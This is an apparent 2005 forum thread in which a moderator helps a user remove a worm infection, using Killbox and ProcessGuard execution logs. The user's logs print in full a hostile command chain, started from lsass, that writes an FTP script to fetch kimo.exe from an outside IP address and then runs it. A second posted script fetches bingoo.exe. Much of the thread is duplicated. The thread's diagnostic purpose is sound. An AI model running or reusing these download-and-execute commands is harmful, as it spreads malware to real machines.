Tue 02 - 20:32:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsb967dced95f59c4d9b71494fea294357 ]
Tue 02 - 20:32:40 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds0d7ee5485534404d82ad420d64a146b7 ]
Tue 02 - 20:32:41 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsab2a85c93f2acb4488b569f4312eb1be ]
Tue 02 - 20:34:06 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 02 - 20:34:49 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\program files\processguard\procguard.exe" [376]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Tue 02 - 20:35:52 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
thanks for your help
#94
Posted 02 August 2005 - 03:09 AM
Metallica
-
- GeekU Moderator
-
- 33,101 posts
Spyware Veteran
Bingo 
You posted exactly the pieces with the info I needed.
In ProcessGuard uncheck the learning mode option (if still enabled) and remove the permission for c:\windows\system32\ftp.exe
* Then run Killbox by doubleclicking Killbox.exe
*In the killbox program, select the Delete on Reboot option.
*Open the text file with these instructions in it, and copy the file names below to the clipboard by highlighting them and pressing Control-C:
c:\windows\system32\mwupdate32.exe
c:\windows\system32\msua.exe
*Return to Killbox, go to the File menu, and choose "Paste from Clipboard".
*Click the red-and-white "Delete File" button. Click "Yes" at the Delete on Reboot prompt. Click "No" at the Pending Operations prompt.
Let the computer reboot and find the file:
msw.dll (probably also in c:\windows\system32)
Have that file and c:\windows\system32\ftp.exe scanned at:
http://virusscan.jotti.org/
Post the results of that scan please.
Regards,
You posted exactly the pieces with the info I needed.
In ProcessGuard uncheck the learning mode option (if still enabled) and remove the permission for c:\windows\system32\ftp.exe
* Then run Killbox by doubleclicking Killbox.exe
*In the killbox program, select the Delete on Reboot option.
*Open the text file with these instructions in it, and copy the file names below to the clipboard by highlighting them and pressing Control-C:
c:\windows\system32\mwupdate32.exe
c:\windows\system32\msua.exe
*Return to Killbox, go to the File menu, and choose "Paste from Clipboard".
*Click the red-and-white "Delete File" button. Click "Yes" at the Delete on Reboot prompt. Click "No" at the Pending Operations prompt.
Let the computer reboot and find the file:
msw.dll (probably also in c:\windows\system32)
Have that file and c:\windows\system32\ftp.exe scanned at:
http://virusscan.jotti.org/
Post the results of that scan please.
Regards,
#95
Posted 02 August 2005 - 03:46 AM
duglartis
- Topic Starter
-
- Member
-
- 159 posts
Member
hello again couldnt find msw.dll but did find 2 copies ftp.exe one was in dll file
here is scan results
ftp.exe
Status:
OK
MD5 358f2b1b49483485ce95d68739237ad4
Packers detected:
-
Scanner results
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
UNA
Found nothing
VBA32
Found nothing
thanks for your help
here is scan results
ftp.exe
Status:
OK
MD5 358f2b1b49483485ce95d68739237ad4
Packers detected:
-
Scanner results
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
UNA
Found nothing
VBA32
Found nothing
thanks for your help
#96
Posted 02 August 2005 - 04:02 AM
Metallica
-
- GeekU Moderator
-
- 33,101 posts
Spyware Veteran
Can you try this for me?
(Assuming you did delete the other two files) and are still using ProcessGuard to block the unknown.
ftp.exe is the real file but it is being abused to perform tasks encoded in msw.dll
*Run Killbox again and use Standard File Kill
*Copy & paste this into the Full Path for File to Delete box:
c:\windows\system32\msw.dll
*Click the red-and-white "Delete File" button.
If this was successfull a folder C:\!Submit will be created with subfolders named after the date and a copy of the deleted file inside.
Let me know if it is.
Also let me know if the alarms by AVG have stopped after you deleted the other two files.
Regards,
(Assuming you did delete the other two files) and are still using ProcessGuard to block the unknown.
ftp.exe is the real file but it is being abused to perform tasks encoded in msw.dll
*Run Killbox again and use Standard File Kill
*Copy & paste this into the Full Path for File to Delete box:
c:\windows\system32\msw.dll
*Click the red-and-white "Delete File" button.
If this was successfull a folder C:\!Submit will be created with subfolders named after the date and a copy of the deleted file inside.
Let me know if it is.
Also let me know if the alarms by AVG have stopped after you deleted the other two files.
Regards,
#97
Posted 03 August 2005 - 11:53 PM
duglartis
- Topic Starter
-
- Member
-
- 159 posts
Member
hello
killbox said the file c:\windows\system32\msw.dll does not exist also still getting avg popups after deleting last 2 files also had the ftp programme try to run when typing this so i did not allow it to through PG
thanks for your patience
killbox said the file c:\windows\system32\msw.dll does not exist also still getting avg popups after deleting last 2 files also had the ftp programme try to run when typing this so i did not allow it to through PG
thanks for your patience
#98
Posted 04 August 2005 - 01:01 AM
Metallica
-
- GeekU Moderator
-
- 33,101 posts
Spyware Veteran
Can you post some ProcessGuard logs from next time when AVG sounds the alarm?
I'd like to have another look. See if we can figure out what triggers these infections.
Regards,
I'd like to have another look. See if we can figure out what triggers these infections.
Regards,
#99
Posted 04 August 2005 - 01:14 AM
duglartis
- Topic Starter
-
- Member
-
- 159 posts
Member
log file for today
---Process Guard Log Started---
Thu 04 - 17:46:21 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Thu 04 - 17:46:21 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1332]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Thu 04 - 17:46:22 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Thu 04 - 17:46:22 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1204]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Thu 04 - 17:46:26 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Thu 04 - 17:46:26 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Thu 04 - 17:46:27 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2020]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Thu 04 - 17:46:27 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Thu 04 - 17:46:28 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Thu 04 - 17:46:28 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Thu 04 - 17:46:29 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Thu 04 - 17:46:29 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Thu 04 - 17:46:30 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Thu 04 - 17:46:30 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Thu 04 - 17:46:31 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Thu 04 - 17:46:31 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [452]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Thu 04 - 17:46:31 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds5ceb59ee3dfb9e449890ecd430cfefc5 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf99d48a949d1794aab3ebe4ca59bc6f1 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds7795f4279bf4ca46a9081197841552e3 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsda5087beca8394488d3e4423ff18d8f2 ]
Thu 04 - 17:48:45 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 04 - 17:49:02 [EXECUTION] "c:\documents and settings\dug and tania\desktop\killbox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\desktop\killbox.exe" ]
Thu 04 - 17:50:34 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\ftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1708]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd /c echo open 205.177.75.19 58739 >cdtime.asp &cmd /c echo user wh0re got[bleep]ed >>cdtime.asp &cmd /c echo binary >>cdtime.asp &cmd /c echo get kimo.exe >>cdtime.asp &cmd /c echo bye >>cdtime.asp &cmd /c ftp.exe -n -s:cdtime.asp &cmd /c del cdtime.asp &start kimo.exe
]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo user wh0re got[bleep]ed ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo binary ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo get kimo.exe ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo bye ]
Thu 04 - 17:50:46 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:48 [EXECUTION] "c:\windows\system32\ftp.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [1844]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:48 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c del cdtime.asp ]
Thu 04 - 19:00:51 [EXECUTION] "c:\windows\system32\defrag.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\defrag.exe" -p 2a4 -s 000013d4 -b c: ]
Thu 04 - 19:00:52 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsff9590f5c1608e44bf9ad392550e60d0 ]
Thu 04 - 19:00:52 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsaf71e58616f3534196e4c1642b9d4509 ]
Thu 04 - 19:01:29 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 04 - 19:13:25 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
---Process Guard Log Started---
Thu 04 - 17:46:21 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Thu 04 - 17:46:21 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1332]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Thu 04 - 17:46:22 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Thu 04 - 17:46:22 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1204]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Thu 04 - 17:46:26 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Thu 04 - 17:46:26 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Thu 04 - 17:46:27 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Thu 04 - 17:46:27 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2020]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Thu 04 - 17:46:27 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Thu 04 - 17:46:28 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Thu 04 - 17:46:28 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Thu 04 - 17:46:29 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Thu 04 - 17:46:29 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Thu 04 - 17:46:30 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Thu 04 - 17:46:30 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Thu 04 - 17:46:31 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Thu 04 - 17:46:31 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [452]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Thu 04 - 17:46:31 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds5ceb59ee3dfb9e449890ecd430cfefc5 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf99d48a949d1794aab3ebe4ca59bc6f1 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds7795f4279bf4ca46a9081197841552e3 ]
Thu 04 - 17:47:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsda5087beca8394488d3e4423ff18d8f2 ]
Thu 04 - 17:48:45 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 04 - 17:49:02 [EXECUTION] "c:\documents and settings\dug and tania\desktop\killbox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\desktop\killbox.exe" ]
Thu 04 - 17:50:34 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\ftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1708]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd /c echo open 205.177.75.19 58739 >cdtime.asp &cmd /c echo user wh0re got[bleep]ed >>cdtime.asp &cmd /c echo binary >>cdtime.asp &cmd /c echo get kimo.exe >>cdtime.asp &cmd /c echo bye >>cdtime.asp &cmd /c ftp.exe -n -s:cdtime.asp &cmd /c del cdtime.asp &start kimo.exe
]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo user wh0re got[bleep]ed ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo binary ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo get kimo.exe ]
Thu 04 - 17:50:45 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c echo bye ]
Thu 04 - 17:50:46 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:48 [EXECUTION] "c:\windows\system32\ftp.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [1844]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:48 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1484]
[EXECUTION] Commandline - [ cmd /c del cdtime.asp ]
Thu 04 - 19:00:51 [EXECUTION] "c:\windows\system32\defrag.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\defrag.exe" -p 2a4 -s 000013d4 -b c: ]
Thu 04 - 19:00:52 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsff9590f5c1608e44bf9ad392550e60d0 ]
Thu 04 - 19:00:52 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsaf71e58616f3534196e4c1642b9d4509 ]
Thu 04 - 19:01:29 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 04 - 19:13:25 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
#100
Posted 04 August 2005 - 02:44 AM
Metallica
-
- GeekU Moderator
-
- 33,101 posts
Spyware Veteran
Can you look for these files please:
cdtime.asp
mpdrv.dbx
kimo.exe
bla.txt
2pac.txt
Let me know which ones you find and where.
Regards,
cdtime.asp
mpdrv.dbx
kimo.exe
bla.txt
2pac.txt
Let me know which ones you find and where.
Regards,
#101
Posted 04 August 2005 - 02:59 AM
duglartis
- Topic Starter
-
- Member
-
- 159 posts
Member
hello found 2
kimo.exe-01a0130c.pfc
2pac.txt c\windows\system32
kimo.exe-01a0130c.pfc
2pac.txt c\windows\system32
#102
Posted 04 August 2005 - 03:03 AM
duglartis
- Topic Starter
-
- Member
-
- 159 posts
Member
whoops forgot to add
kimo.exe-01a0130c.pfc c\windows\prefetch
kimo.exe-01a0130c.pfc c\windows\prefetch
#103
Posted 04 August 2005 - 03:20 AM
Metallica
-
- GeekU Moderator
-
- 33,101 posts
Spyware Veteran
OK. The file in the prefetch folder can be deleted. It is useless to us.
Can you open
c:\windows\system32\2pac.txt
and post what's inside.
Regards,
Can you open
c:\windows\system32\2pac.txt
and post what's inside.
Regards,
#104
Posted 04 August 2005 - 03:27 AM
duglartis
- Topic Starter
-
- Member
-
- 159 posts
Member
hello
details are
open IP address removed by Metallica 10087
user [bleep] rulez
binary
get bingoo.exe
quit
cheers
details are
open IP address removed by Metallica 10087
user [bleep] rulez
binary
get bingoo.exe
quit
cheers
Edited by Metallica, 04 August 2005 - 03:37 AM.
#105
Posted 04 August 2005 - 03:35 AM
Metallica
-
- GeekU Moderator
-
- 33,101 posts
Spyware Veteran
I found kimo.exe on the server your computer was hailing.
I'll see if I can get it removed.
I will remove the information from your last post after writing that down.
That looks like another link to a virus
Can you see if bingoo.exe is present on your computer?
Regards,
I'll see if I can get it removed.
